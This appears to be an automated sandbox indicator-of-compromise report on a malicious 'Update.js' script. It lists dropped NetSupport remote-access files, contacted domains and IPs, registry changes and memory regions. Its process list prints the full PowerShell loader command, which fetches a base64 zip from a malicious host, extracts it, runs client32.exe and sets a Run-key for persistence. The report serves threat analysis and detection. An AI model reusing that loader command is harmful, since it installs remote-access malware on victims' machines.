IOC Report
Update.js

loading gif

Files

File Path
Type
Category
Malicious
Update.js
ASCII text, with very long lines (463)
initial sample
malicious
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\NSM.LIC
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\loca[1].htm
ASCII text, with no line terminators
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_febnwrhp.qfn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jlvidhcj.5kh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\CXCC.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\LogoDev.png
PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\NSM.ini
Generic INItialization configuration [Features]
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Setup\2CEE836C30F61F46s
data
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Setup\A88D1CCE15181E1Ds
data
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Setup\CC88C062DAB6233Fs
data
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Setup\Sigma\Advertising
ASCII text
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Setup\Sigma\LICENSE
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\Setup\Sigma\Staging
ASCII text
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.ini
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\delegatedWebFeatures.sccd
XML 1.0 document, ASCII text, with very long lines (15941), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\install_state.json
ASCII text, with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\nskbfltr.inf
Windows setup INFormation
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\nsm_vpro.ini
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\package_metadata
ASCII text, with CRLF line terminators
dropped
There are 19 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
malicious
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
"C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://ggoryo.com/trade/da
unknown
malicious
http://5.181.159.137/fakeurl.htm
5.181.159.137
malicious
https://ggoryo.com
unknown
malicious
https://ggoryo.com/
unknown
malicious
https://ggoryo.com/trade/da.php?9800
77.83.199.112
malicious
https://ggoryo.com/trade/fix.php?6867
77.83.199.112
malicious
https://www.google.com/intl/en-US/chrome/blank.htmlX
unknown
http://www.netsupportsoftware.com
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://www.pci.co.uk/support
unknown
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
unknown
https://www.google.com/intl/en-US/chrome/blank.html
unknown
http://%s/testpage.htmwininet.dll
unknown
http://geo.netsupportsoftware.com/location/loca.asp
104.26.1.231
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://ggoryo.com/s
unknown
http://www.pci.co.uk/supportsupport
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://ocsp.thawte.com0
unknown
https://contoso.com/License
unknown
http://crl.mic
unknown
http://geo.netsupportsoftware.com/location/loca.aspws
unknown
https://contoso.com/Icon
unknown
http://127.0.0.1RESUMEPRINTING
unknown
http://%s/testpage.htm
unknown
http://127.0.0.1
unknown
http://geo.netsupportsoftware.com/location/loca.aspwe
unknown
http://www.symauth.com/cps0(
unknown
https://ggoryo.com/trade/fix.php?6867EF
unknown
https://github.com/Pester/Pester
unknown
http://%s/fakeurl.htm
unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0
unknown
http://www.symauth.com/rpa00
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.google.com/intl/en-US/chrome/blank.htmlXVNT
unknown
http://www.netsupportschool.com/tutor-assistant.asp11(L
unknown
https://aka.ms/pscore68
unknown
https://ggorxo.com/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.netsupportschool.com/tutor-assistant.asp
unknown
https://www-googleapis-staging.sandbox.google.com
unknown
https://oneget.org
unknown
http://ggoryo.com
unknown
https://ggoryo.com/0X
unknown
There are 38 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ggoryo.com
77.83.199.112
malicious
geo.netsupportsoftware.com
104.26.1.231

IPs

IP
Domain
Country
Malicious
77.83.199.112
ggoryo.com
Lithuania
malicious
5.181.159.137
unknown
Moldova Republic of
malicious
104.26.1.231
geo.netsupportsoftware.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
DIWFE
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1FC551EE000
heap
page read and write
1FC5574A000
heap
page read and write
1FC619F4000
heap
page read and write
1FC54489000
heap
page read and write
1FC5589B000
heap
page read and write
1FC558DE000
heap
page read and write
1FC548EB000
heap
page read and write
1FC54625000
heap
page read and write
1FC556F1000
heap
page read and write
1FC55836000
heap
page read and write
1FC555B1000
heap
page read and write
1FC54874000
heap
page read and write
1FC53999000
heap
page read and write
1FC5525A000
heap
page read and write
1FC54192000
heap
page read and write
1FC54F69000
heap
page read and write
1FC54DC5000
heap
page read and write
26C01908000
trusted library allocation
page read and write
1FC551F6000
heap
page read and write
1FC5580E000
heap
page read and write
1FC62474000
heap
page read and write
1FC544E6000
heap
page read and write
6CCA0000
unkown
page readonly
1FC54F09000
heap
page read and write
1FC54D15000
heap
page read and write
1FC5504E000
heap
page read and write
26C00B46000
trusted library allocation
page read and write
1FC615B8000
heap
page read and write
6CA80000
unkown
page readonly
7FFECBD40000
trusted library allocation
page read and write
1FC54519000
heap
page read and write
7FFECBA50000
trusted library allocation
page read and write
6091000
heap
page read and write
59A9000
heap
page read and write
1FC60AE5000
heap
page read and write
1FC54A8E000
heap
page read and write
1FC60FDC000
heap
page read and write
EE9000
heap
page read and write
1FC556E9000
heap
page read and write
1FC556B0000
heap
page read and write
1FC54F65000
heap
page read and write
1FC608AC000
heap
page read and write
1FC54511000
heap
page read and write
1FC55A4F000
heap
page read and write
1FC5464E000
heap
page read and write
1FC5573A000
heap
page read and write
1FC559F7000
heap
page read and write
5964000
heap
page read and write
3A2C000
stack
page read and write
1FC60FEE000
heap
page read and write
7FFECBE70000
trusted library allocation
page read and write
1FC55826000
heap
page read and write
1FC51A9E000
heap
page read and write
1FC60C4C000
heap
page read and write
26C752E5000
heap
page read and write
1FC539A9000
heap
page read and write
1FC545F1000
heap
page read and write
1FC54E79000
heap
page read and write
1FC55056000
heap
page read and write
FA7C07E000
stack
page read and write
1FC61C94000
heap
page read and write
1FC55712000
heap
page read and write
1FC555C3000
heap
page read and write
1FC54EDD000
heap
page read and write
1FC55540000
heap
page read and write
1FC5FBB0000
heap
page read and write
1FC54C29000
heap
page read and write
1FC5578A000
heap
page read and write
26C752B0000
heap
page read and write
1FC60CE8000
heap
page read and write
26C00D2C000
trusted library allocation
page read and write
1FC54B50000
heap
page read and write
1FC552FE000
heap
page read and write
26C74F7E000
heap
page read and write
1FC544C2000
heap
page read and write
1FC61FBE000
heap
page read and write
1FC53AFF000
heap
page read and write
1FC5597F000
heap
page read and write
1FC556B5000
heap
page read and write
5A1D000
heap
page read and write
1FC54F95000
heap
page read and write
1FC62302000
heap
page read and write
112AD000
unkown
page readonly
1FC555F8000
heap
page read and write
1FC54B38000
heap
page read and write
1FC54B0A000
heap
page read and write
1FC620C0000
heap
page read and write
1FC54FC5000
heap
page read and write
1FC61E44000
heap
page read and write
1FC5560C000
heap
page read and write
1FC54E49000
heap
page read and write
1FC540FD000
heap
page read and write
1466000
heap
page read and write
1FC555F8000
heap
page read and write
1FC54CA9000
heap
page read and write
1FC55102000
heap
page read and write
1FC556F9000
heap
page read and write
1FC558BA000
heap
page read and write
1FC547FC000
heap
page read and write
1FC545D1000
heap
page read and write
1FC54E95000
heap
page read and write
26C00D40000
trusted library allocation
page read and write
7FFECBFA0000
trusted library allocation
page execute and read and write
1FC54FFA000
heap
page read and write
1FC609AC000
heap
page read and write
7FFECC220000
trusted library allocation
page read and write
1FC55883000
heap
page read and write
1FC5501A000
heap
page read and write
1FC558FA000
heap
page read and write
1FC54F5D000
heap
page read and write
1FC54B84000
heap
page read and write
1FC54B58000
heap
page read and write
EE2000
heap
page read and write
1FC5506A000
heap
page read and write
1FC60D4E000
heap
page read and write
1430000
heap
page read and write
1FC55721000
heap
page read and write
1FC55589000
heap
page read and write
1FC54591000
heap
page read and write
1FC54F29000
heap
page read and write
1FC60C82000
heap
page read and write
1FC54AA6000
heap
page read and write
1FC55572000
heap
page read and write
1FC53959000
heap
page read and write
1FC54FFE000
heap
page read and write
1FC61768000
heap
page read and write
1FC60B5C000
heap
page read and write
7FFECBC50000
trusted library allocation
page read and write
1FC61BF8000
heap
page read and write
1FC553A6000
heap
page read and write
7FFECC130000
trusted library allocation
page read and write
1FC4FC3C000
heap
page read and write
1FC557BA000
heap
page read and write
1FC621B0000
heap
page read and write
599E000
heap
page read and write
7FFECC0A0000
trusted library allocation
page read and write
1FC55524000
heap
page read and write
1FC55877000
heap
page read and write
1FC55782000
heap
page read and write
1FC559D7000
heap
page read and write
1FC55638000
heap
page read and write
1FC53C29000
heap
page read and write
26C00DE8000
trusted library allocation
page read and write
1FC5FFB8000
heap
page read and write
26C72EB0000
trusted library allocation
page read and write
1FC55142000
heap
page read and write
1FC54491000
heap
page read and write
1FC60D60000
heap
page read and write
1FC555BF000
heap
page read and write
1FC5522A000
heap
page read and write
1FC55678000
heap
page read and write
1FC55362000
heap
page read and write
6CCA1000
unkown
page execute read
1FC54DF5000
heap
page read and write
1FC556F5000
heap
page read and write
1FC55664000
heap
page read and write
1FC556E9000
heap
page read and write
1FC555B2000
heap
page read and write
1FC60846000
heap
page read and write
1FC539B5000
heap
page read and write
7FFECBC4B000
trusted library allocation
page read and write
1FC61959000
heap
page read and write
73A94000
unkown
page readonly
1FC54ED1000
heap
page read and write
1FC5576A000
heap
page read and write
747F2000
unkown
page readonly
26C730C0000
trusted library allocation
page read and write
1FC53A15000
heap
page read and write
7FFECC060000
trusted library allocation
page read and write
1FC55112000
heap
page read and write
1FC559B3000
heap
page read and write
1FC555BA000
heap
page read and write
7FFECBC70000
trusted library allocation
page read and write
1FC54BCC000
heap
page read and write
1FC539A5000
heap
page read and write
6CD59000
unkown
page readonly
1FC553B6000
heap
page read and write
1FC53DFC000
heap
page read and write
1FC5537A000
heap
page read and write
1FC5510A000
heap
page read and write
1FC607AB000
heap
page read and write
7FFECC550000
trusted library allocation
page read and write
1FC539F5000
heap
page read and write
1FC55614000
heap
page read and write
1FC626F0000
heap
page read and write
1FC557E2000
heap
page read and write
1FC558CB000
heap
page read and write
1FC53B7F000
heap
page read and write
1FC5523A000
heap
page read and write
1FC557B6000
heap
page read and write
1FC55596000
heap
page read and write
1FC54C3D000
heap
page read and write
1FC53B6A000
heap
page read and write
1FC53879000
heap
page read and write
7FFECC360000
trusted library allocation
page read and write
1FC623D8000
heap
page read and write
1FC54F75000
heap
page read and write
1FC617CE000
heap
page read and write
26C00B88000
trusted library allocation
page read and write
1FC55226000
heap
page read and write
1FC54DA1000
heap
page read and write
1FC55973000
heap
page read and write
1FC616CC000
heap
page read and write
1FC60E50000
heap
page read and write
1FC6225E000
heap
page read and write
1FC559AB000
heap
page read and write
1FC6187C000
heap
page read and write
1FC60720000
heap
page read and write
1FC60D0C000
heap
page read and write
1FC557E7000
heap
page read and write
1FC60BE6000
heap
page read and write
1FC54B44000
heap
page read and write
1FC5517A000
heap
page read and write
1FC54EE5000
heap
page read and write
1FC55356000
heap
page read and write
26C74A90000
heap
page read and write
7FFECBF90000
trusted library allocation
page read and write
1FC5530E000
heap
page read and write
26C00B3A000
trusted library allocation
page read and write
1FC5FD18000
heap
page read and write
1FC55807000
heap
page read and write
1FC53974000
heap
page read and write
1FC614C8000
heap
page read and write
1FC54581000
heap
page read and write
1FC54FE6000
heap
page read and write
1FC611F2000
heap
page read and write
1FC556ED000
heap
page read and write
1FC5FE3E000
heap
page read and write
FA7C0F9000
stack
page read and write
1FC54D09000
heap
page read and write
1FC54475000
heap
page read and write
1FC54B06000
heap
page read and write
1FC54800000
heap
page read and write
1FC61846000
heap
page read and write
1FC61540000
heap
page read and write
7FFECBD10000
trusted library allocation
page execute and read and write
26C10021000
trusted library allocation
page read and write
1FC54E89000
heap
page read and write
1FC5515A000
heap
page read and write
7FFECC372000
trusted library allocation
page read and write
1FC5573E000
heap
page read and write
1FC545F5000
heap
page read and write
1FC54F05000
heap
page read and write
1FC54D85000
heap
page read and write
7FFECBF00000
trusted library allocation
page read and write
1FC539AD000
heap
page read and write
1FC557D7000
heap
page read and write
1FC558F7000
heap
page read and write
1FC55549000
heap
page read and write
1FC55983000
heap
page read and write
1FC54E41000
heap
page read and write
1FC5574F000
heap
page read and write
1FC53945000
heap
page read and write
1FC625D9000
heap
page read and write
1FC557DB000
heap
page read and write
26C74EC0000
heap
page read and write
1FC54E91000
heap
page read and write
1FC55520000
heap
page read and write
1FC5194B000
heap
page read and write
1FC54DF1000
heap
page read and write
7FFECBD00000
trusted library allocation
page read and write
1460000
heap
page read and write
1FC5FCC4000
heap
page read and write
7FFECC470000
trusted library allocation
page read and write
1FC54B40000
heap
page read and write
1FC55632000
heap
page read and write
1FC61204000
heap
page read and write
59A6000
heap
page read and write
1FC55659000
heap
page read and write
1FC61756000
heap
page read and write
1FC54F59000
heap
page read and write
1FC55690000
heap
page read and write
1FC54619000
heap
page read and write
1FC54AB6000
heap
page read and write
1FC557BA000
heap
page read and write
1FC5555C000
heap
page read and write
1FC620CF000
heap
page read and write
1FC557AA000
heap
page read and write
37EE000
stack
page read and write
1FC54824000
heap
page read and write
26C10019000
trusted library allocation
page read and write
6CAC9000
unkown
page write copy
1FC54D71000
heap
page read and write
26C0139F000
trusted library allocation
page read and write
1FC61012000
heap
page read and write
5960000
heap
page read and write
1FC557CF000
heap
page read and write
1FC554F0000
heap
page read and write
1FC55685000
heap
page read and write
747F1000
unkown
page execute read
1FC53949000
heap
page read and write
1FC55306000
heap
page read and write
1FC625EE000
heap
page read and write
1FC54E69000
heap
page read and write
1FC54E9D000
heap
page read and write
1FC5588F000
heap
page read and write
1FC620D2000
heap
page read and write
1FC554BD000
heap
page read and write
1FC54FD5000
heap
page read and write
1FC54899000
heap
page read and write
1FC53A21000
heap
page read and write
1FC553D1000
heap
page read and write
1FC5501E000
heap
page read and write
1FC6209C000
heap
page read and write
1FC54C25000
heap
page read and write
EE8000
heap
page read and write
1FC60810000
heap
page read and write
747F0000
unkown
page readonly
1FC545C1000
heap
page read and write
1FC53B75000
heap
page read and write
1FC60CC4000
heap
page read and write
1FC54EB5000
heap
page read and write
1FC555C7000
heap
page read and write
1FC555BC000
heap
page read and write
1FC6109C000
heap
page read and write
1FC54FAD000
heap
page read and write
1FC53919000
heap
page read and write
1FC55072000
heap
page read and write
1FC55AA3000
heap
page read and write
1FC61EAA000
heap
page read and write
1FC54847000
heap
page read and write
7FFECBE94000
trusted library allocation
page read and write
1FC61A18000
heap
page read and write
1FC60798000
heap
page read and write
1FC54535000
heap
page read and write
1FC62756000
heap
page read and write
1FC61EBC000
heap
page read and write
1FC54565000
heap
page read and write
1FC547F9000
heap
page read and write
1FC5FE2C000
heap
page read and write
1FC60F11000
heap
page read and write
1FC55813000
heap
page read and write
1FC60306000
heap
page read and write
1FC555CF000
heap
page read and write
1FC55711000
heap
page read and write
1FC54D81000
heap
page read and write
1FC544E9000
heap
page read and write
1FC55896000
heap
page read and write
1FC558B2000
heap
page read and write
1FC54495000
heap
page read and write
1FC5538A000
heap
page read and write
1FC54531000
heap
page read and write
1FC5483F000
heap
page read and write
FA7B7CF000
stack
page read and write
1FC551CE000
heap
page read and write
1FC5566C000
heap
page read and write
1FC5481A000
heap
page read and write
1FC54D65000
heap
page read and write
1FC55634000
heap
page read and write
ECB000
heap
page read and write
1FC54BE9000
heap
page read and write
1FC60EDA000
heap
page read and write
60C9000
heap
page read and write
1FC61F46000
heap
page read and write
1FC53BF4000
heap
page read and write
1FC558D7000
heap
page read and write
26C74F34000
heap
page read and write
1FC60922000
heap
page read and write
1FC54B02000
heap
page read and write
5CDD000
stack
page read and write
1FC55242000
heap
page read and write
1FC5480B000
heap
page read and write
1FC603F6000
heap
page read and write
1FC556D5000
heap
page read and write
1FC55352000
heap
page read and write
1FC556C5000
heap
page read and write
1FC53964000
heap
page read and write
1FC5520E000
heap
page read and write
1FC53F69000
heap
page read and write
1FC5580F000
heap
page read and write
1FC5459D000
heap
page read and write
1FC5395C000
heap
page read and write
1FC5518A000
heap
page read and write
1FC60DD9000
heap
page read and write
59A8000
heap
page read and write
7FFECC040000
trusted library allocation
page read and write
1FC61B1A000
heap
page read and write
1FC551AA000
heap
page read and write
1FC54CC5000
heap
page read and write
1FC54B18000
heap
page read and write
1FC5521E000
heap
page read and write
1FC54D0D000
heap
page read and write
1FC55554000
heap
page read and write
1FC5586E000
heap
page read and write
1FC54EFD000
heap
page read and write
26C00B24000
trusted library allocation
page read and write
1FC5550C000
heap
page read and write
1FC61FAC000
heap
page read and write
1FC54C15000
heap
page read and write
1FC54FB9000
heap
page read and write
1FC54DD1000
heap
page read and write
1FC5563D000
heap
page read and write
1FC548F3000
heap
page read and write
1FC5396D000
heap
page read and write
1FC54555000
heap
page read and write
1FC54CE1000
heap
page read and write
1FC54CD5000
heap
page read and write
1FC55016000
heap
page read and write
1FC545D5000
heap
page read and write
1FC54C99000
heap
page read and write
1FC539D1000
heap
page read and write
7FFECBEA0000
trusted library allocation
page read and write
1FC55192000
heap
page read and write
7FFECC39A000
trusted library allocation
page read and write
1FC5575A000
heap
page read and write
1FC54927000
heap
page read and write
1FC60BB0000
heap
page read and write
1FC541FE000
heap
page read and write
1FC62576000
heap
page read and write
1FC5397C000
heap
page read and write
1FC538E2000
heap
page read and write
1FC54890000
heap
page read and write
1FC624FE000
heap
page read and write
1FC54F61000
heap
page read and write
F39000
heap
page read and write
1FC553BA000
heap
page read and write
1FC61630000
heap
page read and write
1FC5564C000
heap
page read and write
1FC55897000
heap
page read and write
1FC54B9C000
heap
page read and write
1FC538F2000
heap
page read and write
1FC558B3000
heap
page read and write
1FC552BE000
heap
page read and write
1FC555B6000
heap
page read and write
7FFECBEEE000
trusted library allocation
page read and write
F0C000
heap
page read and write
1FC54AD6000
heap
page read and write
1FC5FD3C000
heap
page read and write
26C00DFC000
trusted library allocation
page read and write
26C003D6000
trusted library allocation
page read and write
1FC556A9000
heap
page read and write
1FC551AE000
heap
page read and write
1FC54B90000
heap
page read and write
1FC54FBD000
heap
page read and write
1FC557A2000
heap
page read and write
1FC54551000
heap
page read and write
FA7BE74000
stack
page read and write
1FC61A6C000
heap
page read and write
1FC55592000
heap
page read and write
1FC53C9D000
heap
page read and write
1FC554E8000
heap
page read and write
1FC54561000
heap
page read and write
7FFECC570000
trusted library allocation
page read and write
1FC55816000
heap
page read and write
1FC551B2000
heap
page read and write
1FC61390000
heap
page read and write
596D000
heap
page read and write
1FC5484F000
heap
page read and write
1FC53A49000
heap
page read and write
747F4000
unkown
page readonly
1FC61228000
heap
page read and write
26C730E0000
heap
page read and write
1FC544F5000
heap
page read and write
1129E000
unkown
page readonly
1FC559E3000
heap
page read and write
1FC556F6000
heap
page read and write
1FC54880000
heap
page read and write
1FC548F7000
heap
page read and write
1FC558FB000
heap
page read and write
1FC61E86000
heap
page read and write
1FC60DD8000
heap
page read and write
7FFECBBE0000
trusted library allocation
page read and write
1FC54525000
heap
page read and write
1FC60F88000
heap
page read and write
1FC6286A000
heap
page read and write
1FC53A4C000
heap
page read and write
1FC5FF64000
heap
page read and write
1FC54C05000
heap
page read and write
2C4D000
stack
page read and write
1FC5536A000
heap
page read and write
1FC5529A000
heap
page read and write
1FC54BDD000
heap
page read and write
1FC538F9000
heap
page read and write
1FC54C21000
heap
page read and write
1FC550EA000
heap
page read and write
1FC61C2E000
heap
page read and write
1FC60E0E000
heap
page read and write
1FC54B28000
heap
page read and write
1FC57DCF000
heap
page read and write
1FC5460D000
heap
page read and write
EB0000
heap
page read and write
E30000
heap
page read and write
1FC54B98000
heap
page read and write
FA7B70E000
stack
page read and write
3030000
heap
page read and write
1FC54EC1000
heap
page read and write
598B000
heap
page read and write
7FFECC110000
trusted library allocation
page read and write
1FC5559A000
heap
page read and write
1FC557D3000
heap
page read and write
1FC54D4D000
heap
page read and write
1FC554F4000
heap
page read and write
1FC61D1E000
heap
page read and write
1FC54811000
heap
page read and write
1FC62048000
heap
page read and write
1FC51B9E000
heap
page read and write
1FC60408000
heap
page read and write
1FC550E2000
heap
page read and write
1FC621BF000
heap
page read and write
1FC54E21000
heap
page read and write
26C00DDA000
trusted library allocation
page read and write
1FC558D6000
heap
page read and write
26C74945000
heap
page read and write
1FC53949000
heap
page read and write
1FC60042000
heap
page read and write
1FC5585E000
heap
page read and write
1FC53A56000
heap
page read and write
7FFECC200000
trusted library allocation
page read and write
1FC55A47000
heap
page read and write
1FC51A0D000
heap
page read and write
26C75C40000
heap
page read and write
1FC55640000
heap
page read and write
1FC61E0E000
heap
page read and write
1FC54521000
heap
page read and write
1FC61F46000
heap
page read and write
1FC55262000
heap
page read and write
1FC555FC000
heap
page read and write
1FC54A66000
heap
page read and write
1FC548FB000
heap
page read and write
1FC61F88000
heap
page read and write
1FC5587E000
heap
page read and write
1FC610F0000
heap
page read and write
37F0000
heap
page read and write
1FC53980000
heap
page read and write
3D3E000
stack
page read and write
1FC5594B000
heap
page read and write
1FC557FF000
heap
page read and write
1FC53931000
heap
page read and write
1FC61D0C000
heap
page read and write
1FC61066000
heap
page read and write
1FC62600000
heap
page read and write
1FC53939000
heap
page read and write
1FC558A6000
heap
page read and write
1FC6055E000
heap
page read and write
1FC558AE000
heap
page read and write
1FC55665000
heap
page read and write
1FC5571A000
heap
page read and write
1FC556FB000
heap
page read and write
1FC551C2000
heap
page read and write
1FC54EE1000
heap
page read and write
7FFECC3D0000
trusted library allocation
page read and write
1FC54BC4000
heap
page read and write
1FC54A9E000
heap
page read and write
1FC54AEA000
heap
page read and write
26C751C3000
heap
page read and write
1FC55681000
heap
page read and write
1FC54857000
heap
page read and write
1FC54F21000
heap
page read and write
1FC54819000
heap
page read and write
7FFECC3C0000
trusted library allocation
page read and write
1FC547F3000
heap
page read and write
1FC53A3D000
heap
page read and write
1FC544D5000
heap
page read and write
442000
unkown
page readonly
1FC60B38000
heap
page read and write
1FC5594F000
heap
page read and write
FA7CC4D000
stack
page read and write
1FC5484B000
heap
page read and write
E4A000
heap
page read and write
5A15000
heap
page read and write
1FC55654000
heap
page read and write
1FC62678000
heap
page read and write
59AF000
heap
page read and write
1FC53A4B000
heap
page read and write
1FC54F01000
heap
page read and write
302D000
stack
page read and write
1FC55923000
heap
page read and write
1FC55655000
heap
page read and write
1FC557FB000
heap
page read and write
1FC610F1000
heap
page read and write
1FC5519A000
heap
page read and write
1FC54B78000
heap
page read and write
59A8000
heap
page read and write
60B1000
heap
page read and write
1FC55366000
heap
page read and write
26C10001000
trusted library allocation
page read and write
1FC5528E000
heap
page read and write
1FC6028E000
heap
page read and write
1FC559CB000
heap
page read and write
1FC55042000
heap
page read and write
7FFECBDA0000
trusted library allocation
page read and write
1FC5502E000
heap
page read and write
1FC551FE000
heap
page read and write
1FC5521A000
heap
page read and write
1FC60F10000
heap
page read and write
1FC5FE1A000
heap
page read and write
1FC558BE000
heap
page read and write
1FC614DA000
heap
page read and write
1FC55833000
heap
page read and write
1FC617BC000
heap
page read and write
1FC60348000
heap
page read and write
1FC550DA000
heap
page read and write
1FC62450000
heap
page read and write
1FC5554C000
heap
page read and write
1FC54EAD000
heap
page read and write
1FC61BE6000
heap
page read and write
1FC612C4000
heap
page read and write
26C00D82000
trusted library allocation
page read and write
1FC55022000
heap
page read and write
1FC54BC8000
heap
page read and write
1FC53A89000
heap
page read and write
1FC54BF9000
heap
page read and write
1FC55316000
heap
page read and write
1FC55722000
heap
page read and write
26C00229000
trusted library allocation
page read and write
1FC55933000
heap
page read and write
1FC5FDA2000
heap
page read and write
1FC54E71000
heap
page read and write
1FC54569000
heap
page read and write
1FC551BE000
heap
page read and write
1FC555A9000
heap
page read and write
1FC55591000
heap
page read and write
1FC5453D000
heap
page read and write
599C000
heap
page read and write
26C72F12000
heap
page read and write
1FC54E61000
heap
page read and write
F0C000
heap
